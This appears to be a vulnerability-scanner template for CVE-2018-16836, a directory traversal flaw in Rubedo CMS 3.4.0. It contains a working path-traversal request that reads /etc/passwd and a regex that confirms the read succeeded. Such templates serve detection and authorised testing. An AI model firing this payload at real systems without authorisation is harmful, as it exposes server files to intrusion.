id: CVE-2018-16836 info: name: Rubedo CMS 3.4.0 - Directory Traversal author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/45385 tags: cve,cve2018,rubedo,lfi requests: - method: GET path: - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" - type: status status: - 200